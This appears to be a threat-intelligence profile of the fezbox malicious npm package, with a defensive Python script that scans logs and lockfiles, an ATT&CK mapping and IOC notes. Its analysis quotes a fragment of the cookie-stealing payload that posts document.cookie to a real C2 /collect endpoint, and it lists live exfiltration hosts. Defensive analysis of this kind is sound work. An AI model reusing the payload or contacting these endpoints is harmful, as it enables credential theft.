
Fezbox

fezbox is a malicious npm package first observed on August 21, 2025. It used an unusual QR code steganography technique to deliver a base64-encoded JavaScript payload tagged "[FEZBOX]". The package was designed to steal browser cookies and related browser context, including document.cookie, window.location.origin, navigator.userAgent, and reported usernames and passwords from browser web cookies. The malware introduced a 120-second execution delay and performed environment checks before continuing, likely as sandbox evasion.

It then retrieved a QR code image from the primary command-and-control server at 1[.]94[.]210[.]59, decoded the embedded payload, and exfiltrated collected data via HTTP POST requests to the /collect endpoint. A secondary exfiltration endpoint was also identified at my-nest-app-production[.]up[.]railway[.]app/users. The primary infrastructure was hosted on a Huawei Cloud ECS instance in Beijing, with exposed services on ports 80, 8080, and 9090, including dashboards labeled "C2 Monitor Panel - Educational Use" and "DARKNET C2 CONTROL PANEL."

The package was published under the npm alias janedu using the email janedu0216@gmail.com. npm seized the package on September 22, 2025, suspended the janedu account, and replaced the malicious versions 1.0.0 through 1.3.0 with a 0.0.1-security holding package. The package remained live for 32 days and reached up to 476 downloads. As of April 3, 2026, the C2 server remained online. Investigation of an exposed exfiltration database at 1[.]94[.]210[.]59/data found five records, three of which were attributed to the operator's own test runs; the available content states there were no confirmed victim records, likely because the payload relied on browser APIs that are not normally present in Node.js environments.
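A defender-side check built from the indicators named above, added here as an example and not part of this page or of any vendor tooling: it refangs the published IOCs, scans proxy log lines for POSTs to the /collect and /users exfiltration endpoints, and flags any fezbox entry in a package-lock.json that is not npm's 0.0.1-security holding release. The proxy log layout and the sample lines are constructed assumptions.

```python
import json
import re
from urllib.parse import urlsplit

def refang(value: str) -> str:
    """Turn the defanged indicators published on this page back into matchable strings."""
    return value.replace("[.]", ".").replace("hxxp", "http")

# Indicators from the page: primary C2 host:port and path, secondary exfiltration endpoint,
# and the holding release npm published in place of the malicious 1.0.0 through 1.3.0 versions.
C2_HOSTPORT = refang("1[.]94[.]210[.]59:8080")
C2_PATH = "/collect"
SECONDARY_HOST = refang("my-nest-app-production[.]up[.]railway[.]app")
SECONDARY_PATH = "/users"
PACKAGE = "fezbox"
HOLDING_VERSION = "0.0.1-security"

# Assumed proxy log layout (constructed for this example): "<timestamp> <client> <method> <url> <status>"
LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3})$")

def scan_proxy_log(lines):
    """Return (line_no, reason) for each POST to one of the known exfiltration endpoints."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line.strip())
        if not m or m.group(3) != "POST":
            continue
        u = urlsplit(m.group(4))
        if u.netloc == C2_HOSTPORT and u.path == C2_PATH:
            hits.append((n, "primary C2 /collect"))
        elif u.hostname == SECONDARY_HOST and u.path == SECONDARY_PATH:
            hits.append((n, "secondary exfiltration /users"))
    return hits

def scan_lockfile(lock_json: str):
    """Flag every fezbox entry in a package-lock.json 'packages' map that is not npm's holding release."""
    lock = json.loads(lock_json)
    return [(path, meta.get("version")) for path, meta in lock.get("packages", {}).items()
            if path.rsplit("node_modules/", 1)[-1] == PACKAGE and meta.get("version") != HOLDING_VERSION]

# Constructed sample data: two exfiltration POSTs, one benign registry call, one stale lockfile entry.
SAMPLE_LOG = [
    "2025-09-02T08:14:03Z 10.0.0.17 POST http://1.94.210.59:8080/collect 200",
    "2025-09-02T08:16:40Z 10.0.0.17 POST https://my-nest-app-production.up.railway.app/users 201",
    "2025-09-02T08:17:01Z 10.0.0.17 POST https://registry.npmjs.org/-/npm/v1/security/advisories/bulk 200",
]
SAMPLE_LOCK = json.dumps({"packages": {
    "node_modules/fezbox": {"version": "1.3.0"},
    "node_modules/example-dep": {"version": "1.3.0"},
}})

if __name__ == "__main__":
    print(scan_proxy_log(SAMPLE_LOG), scan_lockfile(SAMPLE_LOCK))
```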

MITRE ATT&CK: Techniques & procedures

14 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access (2 techniques)

T1195 Supply Chain Compromise (evidence: 1)

On August 21, 2025, a package called fezbox appeared on npm... The chain: Developer installs fezbox (dependency confusion or direct install)

T1195.001 Compromise Software Dependencies and Development Tools (evidence: 1)

Malicious npm package fezbox (versions 1.0.0 through 1.3.0) was a real supply chain attack... Executes on npm install (postinstall hook)... Sends JSON POST to hxxp://1[.]94[.]210[.]59:8080/collect

Execution (1 technique)

T1059.007 JavaScript (evidence: 1)

QR code payload encodes Base64 JavaScript that steals browser cookies and sends them to hxxp://1[.]94[.]210[.]59:8080/collect

Stealth (3 techniques)

T1027.003 Steganography (evidence: 1)

FEZBOX used QR code steganography -- an unusual choice for npm supply chain attacks... Fetches a QR code image from 1[.]94[.]210[.]59. Decodes the QR content: a base64-encoded JavaScript payload tagged [FEZBOX]

T1497 Virtualization/Sandbox Evasion (evidence: 1)

Package loads and waits 120 seconds (sandbox evasion). Checks environment to ensure it's running in a real development context

T1497.001 System Checks (evidence: 1)

Checks environment to ensure it's running in a real development context

Credential Access (1 technique)

T1539 Steal Web Session Cookie (evidence: 1)

The JS payload steals document.cookie, window.location.origin, and navigator.userAgent

Discovery (6 techniques)

T1016 System Network Configuration Discovery (evidence: 1)

Collects comprehensive system fingerprint... Network: all interface names, primary IP

T1033 System Owner/User Discovery (evidence: 1)

MITRE ATT&CK Mapping... Discovery: System Owner/User Discovery (T1033): USER, HOME environment variables

T1057 Process Discovery (evidence: 1)

MITRE ATT&CK Mapping... Discovery: Process Discovery (T1057): PID, CWD, execPath collection

T1082 System Information Discovery (evidence: 2)

The data includes: Hostname: hstx; Username: asus; CPU: 13th Gen Intel Core i7-13700H (20 cores); RAM: 16 GB; OS: Windows 11... Node.js: v20.18.0; IP address: 183[.]210[.]123[.]88; Network interfaces...

T1497 Virtualization/Sandbox Evasion (evidence: 1)

Package loads and waits 120 seconds (sandbox evasion). Checks environment to ensure it's running in a real development context

T1497.001 System Checks (evidence: 1)

Checks environment to ensure it's running in a real development context

Collection (1 technique)

T1005 Data from Local System (evidence: 1)

The QR code encodes a Base64 JavaScript payload... const data = { cookies: document.cookie, origin: window.location.origin, userAgent: navigator.userAgent ... }; fetch('hxxp://1[.]94[.]210[.]59:8080/collect' ... )

Command and Control (1 technique)

T1071.001 Web Protocols (evidence: 2)

Exfiltrates via HTTP POST to /collect on the C2

Exfiltration (1 technique)

T1041 Exfiltration Over C2 Channel (evidence: 2)

POST to C2: hxxp://1[.]94[.]210[.]59:8080/collect... LIVE exfiltration receiver -- accepts any JSON

INDICATORS OF COMPROMISE

IOCs tracked for this family

8 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

Network (3 tracked): IPs, domains, and DNS infrastructure linked to this family.

Hashes (2 tracked): File hashes (MD5, SHA-1, SHA-256) from samples and reports.

Other (3 tracked): Other indicator types observed in public reporting.
